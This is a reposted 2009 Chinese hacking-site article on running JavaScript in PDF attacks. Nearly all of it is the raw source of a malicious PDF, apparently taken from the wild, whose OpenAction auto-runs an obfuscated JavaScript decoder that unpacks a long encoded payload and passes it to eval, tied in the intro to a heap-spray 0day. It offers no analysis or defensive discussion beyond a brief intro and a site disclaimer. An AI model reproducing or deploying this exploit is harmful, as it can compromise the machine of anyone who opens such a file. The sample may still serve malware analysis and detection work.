欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

教你在PDF攻击中运行Javascript

来源:本站转载 作者:佚名 时间:2009-03-03 TAG: 我要投稿
结合pdf的0day的POC,heap spray之

http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/


从老外那找的:

%PDF-1.3
%忏嫌
1 0 obj
<</OpenAction <</JS (this.YXWGtha\(\))
/S /JavaScript
>>
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
>>
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
>>
endobj
2 0 obj
[]
endobj
3 0 obj
<</Count 0
/Type /Outlines
>>
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Count 1
/Type /Pages
>>
endobj
5 0 obj
<</Fields []
>>
endobj
6 0 obj
<<>>
endobj
7 0 obj
<</JavaScript 10 0 R
>>
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/Resources 8 0 R
/TrimBox [0 0 595.28000 841.89000]
/MediaBox [0 0 595.28000 841.89000]
/pdftk_PageNum 1
/Contents 11 0 R
/Type /Page
>>
endobj
10 0 obj
<</Names [(New_Script) 12 0 R]
>>
endobj
11 0 obj
<</Length 31
>>
stream
0 0 595.28000 841.89000 re W n

endstream
endobj
12 0 obj
<</JS 13 0 R
/S /JavaScript
>>
endobj
13 0 obj
<</Length 5719
>>
stream
function YXWGtha() {var datfield = 'n2ibBOP6vQHNYsiT8OkPnLlj3OkXBhib9YkMPtP'+'j7@0bm300IOhn4kGj'+'yK2b3BeLzFCM'+'J3lwczIIB3bX'+'cG'+'sgnso9yQdb'+'Nt@LniGINflj'+'nBPLNKG_'+'9ggwrHe_YLh0u@'+'0jmYgMB6J'+'nz8iQS3@LJ3lw'+'czIIB3bXcGso@TsoJ3'+'lwc'+'zIIB'+'3b'+'XcGLJpOPL'+'NKG_9ggwr'+'He_'+'Yt'+'kP'+'nJiIy'+'O2L@hi6FOL_IGiN'+'6'+'HGNB3g0QYh_bso9y'+'Qd'+'b0'+'s2MPtP'+'w'+'u'+'F'+'iNB@'+'HoJ3lw'+'czIIB3bXc'+'GLJnTG'+'oTAM0fF'+'iI0@Ho5Q0uj'+'HHTwzhoPOPNSh'+'GoV3bTuhsjEPlSx3'+'l'+'unTso'+'cBG_fOLb'+'cGH_f'+'gsozKgwnIdnOPdn80eop'+'tkNIA0wfKHwuY'+'PouaG9Y'+'4L_ua'+'G9Y4L_uaG9Y4L_uaG_a'+'Ap'+'XuaI_YaJXuaM9zGdJuaGJcsdJ'+'u'+'a'+'GJct'+'2_uai'+'uaHL_uai'+'uB4L_uaiu4k'+'dX'+'uaiu_t'+'29uaMuaAjXuaMuakpuuaGJ4lJuuaGuaF2uuaiuaApu'+'uaM9mapuuaiuY8puuaiJ'+'aks9uaG9B2j_'+'uaiJaks9uaM9W'+'Aj9uaiu'+'aO'+'L_uai'+'u'+'aApX'+'uaM9ma'+'puuaMX9tL_uaM9yBL9ua'+'i'+'u'+'y'+'8d_ua'+'G_3tL'+'_uaiuaK2_uaiua'+'ApuuaiX'+'1kJ'+'9uaMX9apXuaI93BL9uaM9782'+'_ua'+'G_'+'3ad_'+'uaiuaKJ'+'uua'+'iuaApuuaiX'+'1kJ9uaMX9'+'aj9uaIX1'+'YL'+'9uai_caJuu'+'aG_'+'3ssuuaiuaOsuuaiua'+'ApuuaiX1kJ9'+'uaMX9aj_'+'uaG_cBL9'+'ua'+'G_a'+'h2_u'+'aG_'+'3B'+'Ju'+'uaiua'+'HJXu'+'aiua'+'ApuuaiX1kJ9uaMX92puu'+'a'+'M_WYL9u'+'aG_1'+'3J9uaG_'+'3aL9uaiua'+'h2'+'JuaiuaAp'+'uuaiX1'+'kJ9uaiXakpXuaGu32J'+'uuaiJ'+'1hLXuaM'+'9z82'+'9'+'ua'+'M'+'u38dXuaiu_tJ9uaiuaAduuaMX'+'yapuuaiJ1kJ9uaM9mGpXua'+'iu4KdXuaiuWY'+'29uaM9'+'msp9uaMu3'+'sdXuaG'+'_3s'+'dJua'+'iuaks9uai'+'uaApuuaG'+'J3'+'spuuaMu74dJua'+'iJaHe_ua'+'I9_t'+'L9uaiuaApuu'+'aM9zapu'+'uaM'+'uY8'+'d'+'XuaM'+'_1ks9'+'uaM_akL'+'XuaM'+'9zspuuaIX'+'aKdXu'+'a'+'i_cBL9uaiu'+'aApuuaMXaA'+'puu'+'aiX1ks'+'9u'+'aGJ72p'+'XuaMXzaeuuaMX'+'1ks9uaG_32j9uai'+'ua'+'Y2uuaiua'+'ApuuaiX1'+'AjXuaM__Gpuua'+'M'+'XYa'+'puuaIXyz2_uaM__B2Xuaiu4KpuuaGJ1'+'3L9u'+'ai'+'uaApuuaiJ'+'1'+'Ks_uaM9mGpuuaiuY'+'8dXuaiuWY29uaM9msp9uaM'+'u3sdXuai'+'XaOL9uaiuaAp'+'uu'+'aGJ7apuuaMX3aeJuaiX1AjXuaGuFHp'+'XuaMXFHs9uai_csjXuaI'+'Xa32Xu'+'a'+'MXFh'+'puuaiX1ks9uaGJ72j_uaMXzad'+'Xua'+'M'+'X1ks9uaG_32'+'j9uaiuaHjXu'+'a'+'iuaAp'+'uuaiu'+'aY29u'+'ai'+'J1Ks'+'_u'+'aM9mGp'+'uuaiu38dXua'+'iuZY2'+'9'+'uaM9'+'msp9uaMu3sdX'+'uaMuaOL9uaiuaApu'+'uaGJ'+'7a'+'p'+'uuaM9m8s_uaMuaKdXuai'+'u'+'WY29uaM'+'9msp9uaMu3sdXu'+'aiu'+'aOL9uaiuaApu'+'uaiXWApuuaMXZhe9'+'u'+'aG_W'+'AjX'+'ua'+'G_W'+'Aj'+'XuaG_WA'+'jXuaG_WA'+'jXuaG_Y'+'2LX'+'ua'+'MX7a'+'pXu'+'aM9msjXuaG_ZH29ua'+'MXZKsJuaG'+'_aKs_ua'+'M9ms'+'dXuaM9mtL_uaiu3z'+'J_uaM'+'XB2s'+'9uaMX9aj_uaiJFks9uaM9m4j_'+'uaMuyzJXuaiuF3L9uaMX98LXuaiJ92s9uaiuFHpuu'+'a'+'GuFKLXua'+'iXzsJ9'+'uaG9B8'+'duuaM_FA'+'jXuaGuFhd'+'Juaiuc82'+'Ju'+'aMuaA2_uai_ZFd9uaiu'+'3zJXuaM_ys2uuaiuFA'+'p_uaiXaKsu'+'uai_WOs9'+'uai_'+'y'+'4e9uaiJ1hd_uaMX7t2XuaG_m2s9uaMX72s9'+'uaiuFHpXuaGJ9GJ_uaiuY2'+'s9uaM9m'+'8e9uaMuY'+'sd'+'9uaI_BajXuaiu4ks9'+'uaiu'+'Fk'+'s9uaMXys2XuaM_Zhp'+'_'+'u'+'a'+'iuaAj9uai'+'_'+'4OL9uai_'+'c82_uaMX1K'+'s_uaiXYseuuaiXc8p'+'_uai'+'u'+'aKd_uaI9m2'+'sJuaI9cis'+'9ua'+'M_a'+'H2XuaM9BsJuuaM9Wk'+'2_uaM9722uua'+'M9y'+'iJ_'+'u'+'aI9Y2s9uaI__Gs_'+'uaM9Ys2uuaM9Z'+'kJuu'+'aM9zsJuuaM9Zh'+'s'+'uuaI9_22J'+'ua'+'I97sJ'+'uuaM9mis_uaI9m22_uaM_Wk29uaM9_is_uaI_al'+'s_'+'ua'+'M9m22Ju'+'aI_mG'+'su'+'uaM_zGJ9uaI9'+'ciL_u'+'aI_ZkL'+'XuaG'+'_c'+'Gs96z@Jn'+'2i'+'bBOP09GsSfF'+'oXyf0nEAeopth__Fs_cts_cMsozKg'+'wnzgI'+'13i'+'bcslbzARQ2OkP'+'nIdnOPdn80pgbAg0QFG'+'InJhoBMs'+'ozK'+'g'+'wnso9y'+'Q'+'dbn'+'TsoI3L_'+'5HHS4'+'KG0OYdu'+'n'+'ThowzgI13ibcslbzARQ2gh__HsJ'+'NMsozKgwnJi'+'I'+'yO2L@hi6FO'+'L_nTs'+'o7@ljYHl'+'bcAHM6akN9t2Jca'+'kN9t2JcskMPtPLNK'+'G_9ggwrHe_Y'+'tkPntoXzF'+'lwy80'+'9EYMN5YP'+'LNKG_9gg'+'wrHe_'+'Y6h'+'otk'+'2wdKlMPtPNSh'+'Go'+'jhoQBGeJ1kpbjOkPnBhnrgdjB4HTLARnNAeojth__Fs'+'_cts_cz@gI3L_5HHS4KG0OYduPtPj0hGow2i'+'bBOP0J'+'HgLb'+'Fi0lKdX_zlSptLJ'+'IPIbJfHNj0dX1Y'+'2Iv'+'f20t@'+'p_FY2Xahl0PLg'+'LfPG'+'0mQ0'+'Q1KeJ'+'NAbM@zhoPOP6vQ'+'HNYsiT8'+'go0JH'+'g'+'LbF'+'i0lKdX'+'_zlSe'+'OkPn'+'JiIy'+'O2'+'L@h'+'i6FOL'+'_nMh'+'olKbn2KoSlgsopOk@n2lN'+'I'+'HHNN0'+'g0nGCj8ldNL'+'hLbOhpbmB'+'k'+'MnMGoz'+'Kgw'+'nGHjA'+'Yl_'+'SQeoptk'+'bcOMgz3'+'lj3Agw8AgwY3'+'00I@hN0HCNB3g0QYkMPt@bXle'+'Iy8lQ'+'nTso'+'fF0uwK2bd@PwuOG0SHljwIhf'+'Z'+'0'+'@jbsPoNMsozKgwnTgIsApwnTsoIA0Nn8pwBK'+'lLw'+'GHjAYl_'+'SQpgfYlbBKeNwt2MbGHjAYl'+'_SQpgfYl'+'bBKeNw82Mb'+'GHjAYl_'+'SQpgfYlbBKeNws2MNMsoNkHow'+'Bk0LPRuBgC_eOkPpthJn2PpnBhMjPg6WhI6yTCopTsoy'+'tPpT'+'tk0'+'LPRuBgo_eOhPns2Mn6G@nT'+'gIsApwh'+'K'+'2fn6soyz'+'kMn6G@n'+'Bk0LPRuBgC_'+'eOkPp'+'t@9n2PpnT'+'gIsAp'+'whK2fn6'+'soyzhoofGowTgIsApwhO2f'+'n6so3zkMnM'+'Go5Q0ujHHTw'+'z@'+'J'+'n2ibBO'+'k'+'6'+'5lCuAKpIKksoptkNIA0wfK'+'H'+'wuYPouaG_'+'fOL'+'b'+'uaG_fOLb'+'6z@Jn'+'iGINfljwzCSKFju1P0S'+'zL'+'h0u@0jmY'+'Hooth9mz'+'29Bzh'+'orFbS'+'Zl'+'dXLl'+'o9n'+'MkPnzCSKFju1P0SzMso'+'mYlIY'+'@@b0fH0'+'Sh'+'0'+'nm'+'0'+'gwuOkP'+'nGj0bflb'+'6@@b'+'0fH0uHHNWQ'+'lbNf'+'lTIk00wMIw'+'7hgIJtP'+'o66k0Ylg'+'JnzCSKF'+'j'+'u1P0SzTiMPtk@'+'nTGoOFg'+'S'+'A'+'AM'+'IBG0n4hH'+'9wz@J'; function ewkJz6WdMEew(ayKlCB){ var tp = '63@17@26@39@18@4@50@37@6@41@0@0@0@0@0@0@59@23@34@12@25@24@19@14@15@62@42@7@58@46@57@3@43@55@28@49@54@8@0@21@52@35@20@0@0@0@0@40@0@22@60@32@29@13@51@47@11@30@61@27@31@36@48@44@45@16@9@10@2@53@5@56@1@33@38'; var OzWtBy=0, ze3vvCeSH91=ayKlCB.length, rkJ5q=1024, qC5L0eX9yJLA, Dprxk, aDMkDLpyftp='', j3ZwCEUKDo=OzWtBy, QdiDVgxZ=OzWtBy, Tv4OHt=OzWtBy, WmCRNE2KQFplTd=Array(); WmCRNE2KQFplTd = tp.split('@'); for(eval('Dprxk=Ma'+'th.'+'ce'+'il(ze3vvCeSH91'+'/rkJ5q)');Dprxk>OzWtBy;Dprxk--){ for(eval('qC5L0eX9yJLA=M'+'ath'+'.m'+'in(ze3vvCeSH91,'+'rkJ5q)');qC5L0eX9yJLA>OzWtBy;qC5L0eX9yJLA--,ze3vvCeSH91--){ eval('Tv4OHt|'+'=(WmCRNE2KQFplTd['+'ayKlCB.'+'cha'+'rCo'+'de'+'At(j3ZwCEUKDo+'+'+)-48])<'+'<QdiDVgxZ'); if(QdiDVgxZ){ eval('aDMkDLpyftp+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](144^'+'Tv4OHt&'+'25'+'5)'); Tv4OHt>>=8; QdiDVgxZ-=2; } else { QdiDVgxZ=6; } } } eval(aDMkDLpyftp); } ewkJz6WdMEew(datfield);}
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (2008312053854)
/CreationDate (2008312053854)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000261 00000 n
0000000279 00000 n
0000000324 00000 n
0000000397 00000 n
0000000428 00000 n
0000000448 00000 n
0000000487 00000 n
0000000553 00000 n
0000000731 00000 n
0000000781 00000 n
0000000862 00000 n
0000000909 00000 n
0000004186 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
4374
%%EOF


【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载